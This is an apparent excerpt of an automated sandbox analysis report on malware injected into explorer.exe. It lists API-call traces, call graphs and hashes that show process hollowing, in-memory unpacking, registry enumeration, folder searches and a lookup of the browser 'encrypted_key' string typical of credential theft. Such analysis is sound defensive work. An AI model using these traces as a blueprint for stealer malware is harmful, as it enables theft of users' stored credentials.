                                    • lstrlenW.KERNEL32(00000000,00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081BCC
                                    • StrStrIW.SHLWAPI(00000000,.exe), ref: 00081BF0
                                    • StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00081C05
                                    • lstrlenW.KERNEL32(00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081C1C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: .exe
                                    • API String ID: 1659193697-4119554291
                                    • Opcode ID: 3b6586b102a63786dc969872238a75f7c0e986793e750fed812a843c71e5f381
                                    • Instruction ID: a0118cb623026bdd7b2c274268af9be0d5b1314d990870a25fc60afa0df14884
                                    • Opcode Fuzzy Hash: 3b6586b102a63786dc969872238a75f7c0e986793e750fed812a843c71e5f381
                                    • Instruction Fuzzy Hash: 40F0C2343516209AE3757F34AC45AFB67ECFF05341B14482AE586C31A1EB658C82C769
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: _alldiv_allmul
                                    • String ID: @T$winTruncate1$winTruncate2
                                    • API String ID: 727729158-2430439695
                                    • Opcode ID: 6c3bc0ffe98ea7ba6db45ea80c207c7cd4ae0650a3233a974d4767bbabfbf473
                                    • Instruction ID: ea18af5ff0e1266221c05a6733f4e9d3e46abdbad8da32bdb85636b44682a127
                                    • Opcode Fuzzy Hash: 6c3bc0ffe98ea7ba6db45ea80c207c7cd4ae0650a3233a974d4767bbabfbf473
                                    • Instruction Fuzzy Hash: 8D21B031305200ABEF54AE29CC85EAB37A9FF86310B55812AFD84DB646E634D810D762
                                    APIs
                                    • _allmul.NTDLL(?,00000000,00000018), ref: 0009316F
                                    • _allmul.NTDLL(-00000001,00000000,?,?), ref: 000931D2
                                    • _alldiv.NTDLL(?,?,00000000), ref: 000932DE
                                    • _allmul.NTDLL(00000000,?,00000000), ref: 000932E7
                                    • _allmul.NTDLL(?,00000000,?,?), ref: 00093392
                                      • Part of subcall function 000916CD: memset.NTDLL ref: 0009172B
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: _allmul$_alldivmemset
                                    • String ID:
                                    • API String ID: 3880648599-0
                                    • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                    • Instruction ID: 7d5417d354a438c68078f624bfc985cf19b5d1ae52062b2927a0073bfdafc28c
                                    • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                    • Instruction Fuzzy Hash: C1D188706083419BDB64DF69C480BAEBBE1BF88704F14882DF99587252DB70EE45DF92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: FOREIGN KEY constraint failed$new$old
                                    • API String ID: 0-384346570
                                    • Opcode ID: 3aaead122d65ded614d39b256a48cbbc3585bd41769f8ec99ba0c062035d0474
                                    • Instruction ID: d2be0542dc7b103aa2383b59d4d19c985a4c98580b6e0a806adb31106ad231e1
                                    • Opcode Fuzzy Hash: 3aaead122d65ded614d39b256a48cbbc3585bd41769f8ec99ba0c062035d0474
                                    • Instruction Fuzzy Hash: 8FD14A707083009FD754DF64C481BAFBBE9AB89750F10891EF9458B392DB74D945CB92
                                    APIs
                                    • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 000896E7
                                    • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00089707
                                    • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00089739
                                    • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0008976C
                                    • _allmul.NTDLL(?,?,?,?), ref: 00089798
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: _alldiv$_allmul
                                    • String ID:
                                    • API String ID: 4215241517-0
                                    • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                    • Instruction ID: 2354deb6ee630c1303f222db6580eb32dc7d712fabd7219d97ed6de5167efc95
                                    • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                    • Instruction Fuzzy Hash: 2E210F3222C7252AE7747D5A5CC0BBB3AC8FB90391F2D012EFCC182242FD52885083A2
                                    APIs
                                    • _allmul.NTDLL(?,00000000,00000000), ref: 0009B1B3
                                    • _alldvrm.NTDLL(?,?,00000000), ref: 0009B20F
                                    • _allrem.NTDLL(?,00000000,?,?), ref: 0009B28A
                                    • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0009B298
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: _alldvrm_allmul_allremmemcpy
                                    • String ID:
                                    • API String ID: 1484705121-0
                                    • Opcode ID: 737b708a8e9317edc1ac7e99e378c4384ccc493322af8983ed13a4c59795ab5c
                                    • Instruction ID: 34dcaf0522566fee0e357b28426f49add1cfa5add8272fba0f91c0916a67490a
                                    • Opcode Fuzzy Hash: 737b708a8e9317edc1ac7e99e378c4384ccc493322af8983ed13a4c59795ab5c
                                    • Instruction Fuzzy Hash: 6F4126716083019FCB58EF29D99196EBBE5EFC8310F04892DF98587262DB31EC05DB52
                                    APIs
                                    • GetHGlobalFromStream.OLE32(?,?), ref: 000818A7
                                    • GlobalFix.KERNEL32(00084B57), ref: 000818B6
                                    • GlobalUnWire.KERNEL32(?), ref: 000818F4
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000818E8
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Global$Heap$AllocateFromMemoryMoveProcessStreamWire
                                    • String ID:
                                    • API String ID: 2207111602-0
                                    • Opcode ID: 5cafbe28a3a3ec4851cb6a259a3ffa732d8cee4bddaac059c2034672973d27b0
                                    • Instruction ID: 060e2cafb6cd9e1f5da74f6afce5632343d673e94969e39a5aa9d19e364d1975
                                    • Opcode Fuzzy Hash: 5cafbe28a3a3ec4851cb6a259a3ffa732d8cee4bddaac059c2034672973d27b0
                                    • Instruction Fuzzy Hash: DE016D75205716AF9B016F65DC189DF7BEDFF84351B10842EF88583221EF36D9169B20
                                    APIs
                                    • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                    • lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                    • lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                    • lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1475610065-0
                                    • Opcode ID: 28fed4ad0f0cf8eadd10525803851a75bf33ec1a9cae8159dccb8e6dc05c9a80
                                    • Instruction ID: dbad73746742703d9ceac516fc3b64f4e155f3a4600329a9211bef27ba9de466
                                    • Opcode Fuzzy Hash: 28fed4ad0f0cf8eadd10525803851a75bf33ec1a9cae8159dccb8e6dc05c9a80
                                    • Instruction Fuzzy Hash: BCE065B230021C2B571477AE9C94DBB7BDCDFD96A5705003AFA45D3302EA569C0546B0
                                    APIs
                                    • StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00082FC1
                                    • lstrlen.KERNEL32("encrypted_key":",?,00083FA8), ref: 00082FCE
                                    • StrStrIA.SHLWAPI("encrypted_key":",000D692C), ref: 00082FDD
                                      • Part of subcall function 0008190B: lstrlen.KERNEL32(?,?,?,?,00000000,00082783), ref: 0008192B
                                      • Part of subcall function 0008190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00082783), ref: 00081930
                                      • Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,?), ref: 00081946
                                      • Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,00000000), ref: 0008194A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrlen$lstrcat
                                    • String ID: "encrypted_key":"
                                    • API String ID: 493641738-877455259
                                    • Opcode ID: a4322bf6803f9586c14811d2a79b8cf0638dba37bcc99194ce32fdcef0ee0d4f
                                    • Instruction ID: 530b9dc33729bb16010b955b94d5cbd9baf921e2c03f7890b7047916ace376ef
                                    • Opcode Fuzzy Hash: a4322bf6803f9586c14811d2a79b8cf0638dba37bcc99194ce32fdcef0ee0d4f
                                    • Instruction Fuzzy Hash: 34E09B366067645F93617BB95C548877F5CAF066113090076F74197213DF678801D7B4
                                    APIs
                                      • Part of subcall function 00086A81: memset.NTDLL ref: 00086A9C
                                    • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 000AF2A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: _aulldivmemset
                                    • String ID: %llu$%llu
                                    • API String ID: 714058258-4283164361
                                    • Opcode ID: 1fa5d3c7b91306c1d223e2b65371b4838854418b1e936b93da1fe013090c2820
                                    • Instruction ID: 69e4f2254b1926815d5b2e7edcfc80b6c22c58c624316906a26c5ce3a17bda3f
                                    • Opcode Fuzzy Hash: 1fa5d3c7b91306c1d223e2b65371b4838854418b1e936b93da1fe013090c2820
                                    • Instruction Fuzzy Hash: E221D4B26446066BCA10BA64CC42FBB7758AF81730F044239FA65972C2DB21DC1187E1
                                    APIs
                                    • _allmul.NTDLL(?,00000000,?), ref: 00092174
                                    • _allmul.NTDLL(?,?,?,00000000), ref: 0009220E
                                    • _allmul.NTDLL(?,00000000,00000000,?), ref: 00092241
                                    • _allmul.NTDLL(00082E26,00000000,?,?), ref: 00092295
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: _allmul
                                    • String ID:
                                    • API String ID: 4029198491-0
                                    • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                    • Instruction ID: 63a2b8f53f14eb91fa2b34f2965950cece02bef0a7323c9bf8aaa3ee151b33ee
                                    • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                    • Instruction Fuzzy Hash: 4DA19F70708702AFDB54EF64C891A6EB7E5AFD8704F00482DF6958B352EB71ED449B42
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID:
                                    • API String ID: 1297977491-0
                                    • Opcode ID: 4140e2bc45dec264c31e971d92f3cbd81a15c7904ba40de7e28c5e30a9fc9b6f
                                    • Instruction ID: 69a05d0e1e7b7fd6402ed86353928fc025ddec182e0930d0124d2d6646c1b3c6
                                    • Opcode Fuzzy Hash: 4140e2bc45dec264c31e971d92f3cbd81a15c7904ba40de7e28c5e30a9fc9b6f
                                    • Instruction Fuzzy Hash: D2818D7261C3149FC750EF28C880A6BBBE5FF88704F14492DF88A97252E670E905DB92
                                    APIs
                                    • lstrlen.KERNEL32(?,?,?,?,00000000,00082783), ref: 0008192B
                                    • lstrlen.KERNEL32(00000000,?,?,?,00000000,00082783), ref: 00081930
                                    • lstrcat.KERNEL32(00000000,?), ref: 00081946
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0008194A
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1475610065-0
                                    • Opcode ID: a9493810aaa3a9f76d00b8f14972c51386d0793da0f89b16e647a1f4bc78741e
                                    • Instruction ID: 3aa736acb3aa67acc1ae95169c8ee23454d81dbbc04c5d0cca38af8dffb300d9
                                    • Opcode Fuzzy Hash: a9493810aaa3a9f76d00b8f14972c51386d0793da0f89b16e647a1f4bc78741e
                                    • Instruction Fuzzy Hash: A6E09BA630021C2B572077AE5C94DBB77DCDFD95A53090036FE44C3302EE5AAC0247B0

                                    Execution Graph

                                    Execution Coverage:9.3%
                                    Dynamic/Decrypted Code Coverage:55.1%
                                    Signature Coverage:0%
                                    Total number of Nodes:49
                                    Total number of Limit Nodes:2
                                    execution_graph 949 637f4 950 63804 949->950 955 6372c 950->955 952 63809 954 63817 952->954 959 622b4 952->959 956 6375a 955->956 957 63777 RegCreateKeyExW 956->957 958 637bc 957->958 958->952 960 622d6 959->960 961 622c8 CreateStreamOnHGlobal 959->961 960->954 961->960 981 6a1e0 982 6a1e6 981->982 985 6a298 982->985 990 6a29d 985->990 986 6a385 LoadLibraryA 986->990 988 6a3e0 VirtualProtect VirtualProtect 989 6a46e 988->989 989->989 990->986 990->988 991 6a248 990->991 992 6a1af 993 6a1bd 992->993 994 6a298 3 API calls 993->994 995 6a1cf 993->995 994->995 962 6a298 967 6a29d 962->967 963 6a385 LoadLibraryA 963->967 965 6a3e0 VirtualProtect VirtualProtect 966 6a46e 965->966 966->966 967->963 967->965 968 6a3d5 967->968 969 63608 974 63458 StrStrIW 969->974 971 6363b 972 63458 4 API calls 971->972 973 6365d 972->973 980 6348f 974->980 975 63523 RegOpenKeyExW 976 635ef 975->976 979 6354d 975->979 976->971 977 635b5 RegEnumKeyExW 978 635e4 RegCloseKey 977->978 977->979 978->976 979->977 980->975 996 63668 997 63458 4 API calls 996->997 998 6369b 997->998 999 63458 4 API calls 998->999 1000 636bd 999->1000 1001 6a1f9 1002 6a228 1001->1002 1004 6a248 1001->1004 1003 6a298 3 API calls 1002->1003 1003->1004

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_00062E04 8 Function_00061B8C 0->8 42 Function_00061838 0->42 70 Function_00061860 0->70 1 Function_00061405 2 Function_00062700 10 Function_00062688 2->10 2->70 3 Function_00061000 4 Function_00061980 5 Function_0006B00C 6 Function_0006298C 7 Function_0006188C 7->42 8->42 9 Function_00063608 64 Function_00063458 9->64 10->42 11 Function_00062308 12 Function_00061508 13 Function_00062514 28 Function_000623A0 13->28 51 Function_0006234C 13->51 54 Function_00062354 13->54 71 Function_00062360 13->71 80 Function_000623F0 13->80 14 Function_00061B14 14->42 15 Function_00069912 16 Function_00069C92 17 Function_0006B192 18 Function_00061D10 18->42 83 Function_000618F8 18->83 19 Function_00062410 34 Function_000623AC 19->34 19->80 20 Function_00062610 20->42 21 Function_0006971C 22 Function_0006141D 23 Function_0006A298 63 Function_0006A25A 23->63 24 Function_00062498 24->34 47 Function_00062340 24->47 25 Function_000699A7 26 Function_000647A7 27 Function_00061822 29 Function_00061E20 29->4 29->7 29->18 29->42 46 Function_00061C40 29->46 61 Function_000618D0 29->61 68 Function_00061DE0 29->68 29->70 29->83 30 Function_000628A0 30->42 30->70 78 Function_00062774 30->78 31 Function_0006A1AF 31->23 32 Function_0006372C 32->42 32->70 33 Function_000622AC 35 Function_0006272C 36 Function_000630A8 36->2 36->10 36->35 36->36 36->70 82 Function_00062F7C 36->82 84 Function_00062AF8 36->84 37 Function_00069EB4 38 Function_000622B4 39 Function_000614B2 40 Function_00069930 41 Function_000638B0 41->41 41->42 55 Function_00061AD4 41->55 43 Function_00061938 44 Function_00062938 45 Function_00069FC2 48 Function_000629C0 48->10 49 Function_00062BC0 49->2 49->10 49->20 49->35 49->42 49->43 58 Function_00062A54 49->58 49->70 50 Function_000641CF 52 Function_00061A4C 53 Function_000636C8 53->14 66 Function_000621E4 53->66 53->70 74 Function_000618E8 53->74 56 Function_000614D4 57 Function_00061254 58->42 58->70 59 Function_00063254 59->6 59->10 59->35 59->36 59->42 59->44 59->70 60 Function_0006A055 62 Function_00069ADA 64->2 64->10 64->30 64->42 64->48 64->59 64->64 64->70 64->78 65 Function_000641D9 66->29 66->42 66->70 67 Function_0006A1E0 67->23 68->52 69 Function_00061560 70->55 72 Function_0006156C 73 Function_00062B6C 73->13 73->24 75 Function_000622E8 76 Function_00063668 76->64 77 Function_00061576 78->42 78->70 78->78 79 Function_000637F4 79->11 79->32 79->33 79->38 79->53 79->54 79->73 79->75 81 Function_00062570 79->81 80->34 81->28 81->42 81->54 82->0 82->49 82->58 82->70 85 Function_00062EF8 82->85 84->42 85->20 86 Function_00064178 87 Function_0006A1F9 87->23 88 Function_000614F9

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 107 638b0-63907 call 61ad4 call 61838 NtUnmapViewOfSection call 6388c 116 63911-6391a 107->116 117 63909-6390c call 638b0 107->117 117->116
                                    APIs
                                    • NtUnmapViewOfSection.NTDLL ref: 000638F2
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.509020342.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_61000_explorer.jbxd
                                    Similarity
                                    • API ID: SectionUnmapView
                                    • String ID:
                                    • API String ID: 498011366-0
                                    • Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                    • Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
                                    • Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                    • Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.509020342.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_61000_explorer.jbxd
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID:
                                    • API String ID: 1332880857-0
                                    • Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                    • Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
                                    • Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                    • Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 41 6a298-6a29b 42 6a2a5-6a2a9 41->42 43 6a2b5 42->43 44 6a2ab-6a2b3 42->44 45 6a2b7 43->45 46 6a29d-6a2a3 43->46 44->43 47 6a2ba-6a2c1 45->47 46->42 49 6a2c3-6a2cb 47->49 50 6a2cd 47->50 49->50 50->47 51 6a2cf-6a2d2 50->51 52 6a2e7-6a2f4 51->52 53 6a2d4-6a2e2 51->53 63 6a2f6-6a2f8 52->63 64 6a30e-6a31c call 6a25a 52->64 54 6a2e4-6a2e5 53->54 55 6a31e-6a339 53->55 54->52 57 6a36a-6a36d 55->57 58 6a372-6a379 57->58 59 6a36f-6a370 57->59 62 6a37f-6a383 58->62 61 6a351-6a355 59->61 65 6a357-6a35a 61->65 66 6a33b-6a33e 61->66 67 6a385-6a39e LoadLibraryA 62->67 68 6a3e0-6a3e9 62->68 69 6a2fb-6a302 63->69 64->42 65->58 70 6a35c-6a360 65->70 66->58 74 6a340 66->74 73 6a39f-6a3a6 67->73 71 6a3ec-6a3f5 68->71 90 6a304-6a30a 69->90 91 6a30c 69->91 75 6a341-6a345 70->75 76 6a362-6a369 70->76 77 6a3f7-6a3f9 71->77 78 6a41a-6a46a VirtualProtect * 2 71->78 73->62 80 6a3a8 73->80 74->75 75->61 81 6a347-6a349 75->81 76->57 83 6a40c-6a418 77->83 84 6a3fb-6a40a 77->84 85 6a46e-6a473 78->85 86 6a3b4-6a3bc 80->86 87 6a3aa-6a3b2 80->87 81->61 89 6a34b-6a34f 81->89 83->84 84->71 85->85 92 6a475-6a484 85->92 88 6a3be-6a3ca 86->88 87->88 95 6a3d5-6a3df 88->95 96 6a3cc-6a3d3 88->96 89->61 89->65 90->91 91->64 91->69 96->73
                                    APIs
                                    • LoadLibraryA.KERNEL32 ref: 0006A397
                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
                                    • VirtualProtect.KERNELBASE ref: 0006A45F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.509020342.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_69000_explorer.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$LibraryLoad
                                    • String ID:
                                    • API String ID: 895956442-0
                                    • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                    • Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
                                    • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                    • Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 97 6372c-637ba call 61838 RegCreateKeyExW 101 637d6-637f0 call 61860 97->101 102 637bc-637cb 97->102 102->101 106 637cd-637d3 102->106 106->101
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.509020342.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_61000_explorer.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID: ?
                                    • API String ID: 2289755597-1684325040
                                    • Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                    • Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
                                    • Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                    • Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 119 622b4-622c6 120 622d6-622e6 119->120 121 622c8-622d0 CreateStreamOnHGlobal 119->121 121->120
                                    APIs
                                    • CreateStreamOnHGlobal.OLE32 ref: 000622D0
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.509020342.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_61000_explorer.jbxd
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID:
                                    • API String ID: 2244384528-0
                                    • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                    • Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
                                    • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                    • Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741

                                    Execution Graph

                                    Execution Coverage:15.3%
                                    Dynamic/Decrypted Code Coverage:96.6%
                                    Signature Coverage:0%
                                    Total number of Nodes:233
                                    Total number of Limit Nodes:7
                                    execution_graph 1119 826ac lstrlen 1120 826f3 1119->1120 1121 826c4 CryptBinaryToStringA 1119->1121 1121->1120 1122 826d7 1121->1122 1125 829b7 GetProcessHeap RtlAllocateHeap 1122->1125 1124 826e2 CryptBinaryToStringA 1124->1120 1125->1124 1126 8295c VirtualFree 898 8126e CreateFileW 899 816fb Sleep 898->899 900 8129e GetFileSize 898->900 901 816f3 CloseHandle 900->901 902 812b6 900->902 901->899 902->901 916 829b7 GetProcessHeap RtlAllocateHeap 902->916 904 812cd 905 812db ReadFile 904->905 906 816f2 904->906 910 812fe 905->910 906->901 907 816eb 917 82999 907->917 908 81329 SetFilePointer 908->907 914 81351 908->914 910->907 910->908 911 81374 RtlMoveMemory 911->914 912 813a3 ReadFile 912->914 913 81c39 26 API calls 913->914 914->907 914->911 914->912 914->913 915 81972 29 API calls 914->915 915->914 916->904 922 827e2 VirtualQuery 917->922 920 829b5 920->906 921 829a5 GetProcessHeap HeapFree 921->920 923 827f9 922->923 923->920 923->921 924 8118f 925 81192 924->925 932 8255c 925->932 928 8255c 16 API calls 929 811b9 928->929 930 8255c 16 API calls 929->930 931 811c6 930->931 947 829b7 GetProcessHeap RtlAllocateHeap 932->947 934 8257a lstrcatW PathAppendW 935 8265d 934->935 936 825a2 FindFirstFileW 934->936 938 82999 3 API calls 935->938 936->935 937 825b9 936->937 939 825bd RtlZeroMemory 937->939 941 8263e FindNextFileW 937->941 942 8260f lstrcatW PathAppendW 937->942 945 825df lstrcatW PathAppendW 937->945 946 8255c 5 API calls 937->946 940 811ac 938->940 939->937 940->928 941->939 944 82652 FindClose 941->944 942->941 943 82627 StrStrIW 942->943 943->937 943->941 944->935 945->937 945->941 946->937 947->934 948 81000 949 81010 948->949 950 81007 948->950 952 81016 950->952 953 827e2 VirtualQuery 952->953 954 8101e 953->954 955 81022 954->955 960 829b7 GetProcessHeap RtlAllocateHeap 954->960 955->949 957 8102e RtlMoveMemory NtUnmapViewOfSection 961 8104f 957->961 960->957 1000 829b7 GetProcessHeap RtlAllocateHeap 961->1000 963 8105c 1001 829b7 GetProcessHeap RtlAllocateHeap 963->1001 965 8106b ExpandEnvironmentStringsW 966 8108c ExpandEnvironmentStringsW 965->966 967 81085 965->967 969 81099 966->969 970 810a0 ExpandEnvironmentStringsW 966->970 1002 8123a 967->1002 971 8123a 24 API calls 969->971 972 810ad 970->972 973 810b4 SHGetSpecialFolderPathW 970->973 971->970 974 8123a 24 API calls 972->974 975 810cc ExpandEnvironmentStringsW 973->975 976 810c5 973->976 974->973 978 810d9 975->978 979 810e0 ExpandEnvironmentStringsW 975->979 977 8123a 24 API calls 976->977 977->975 1009 811cc 978->1009 981 810ed 979->981 982 810f4 ExpandEnvironmentStringsW 979->982 1024 81192 981->1024 984 81108 ExpandEnvironmentStringsW 982->984 985 81101 982->985 987 8111c ExpandEnvironmentStringsW 984->987 988 81115 984->988 986 81192 16 API calls 985->986 986->984 990 81129 987->990 991 81130 987->991 989 81192 16 API calls 988->989 989->987 993 81192 16 API calls 990->993 992 82999 3 API calls 991->992 994 81137 992->994 993->991 995 81187 ExitProcess 994->995 1031 829b7 GetProcessHeap RtlAllocateHeap 994->1031 997 8114e 998 8117f 997->998 999 81158 wsprintfA 997->999 998->995 999->998 999->999 1000->963 1001->965 1032 8274a CreateToolhelp32Snapshot 1002->1032 1005 8255c 16 API calls 1006 8125b 1005->1006 1007 8255c 16 API calls 1006->1007 1008 81268 1007->1008 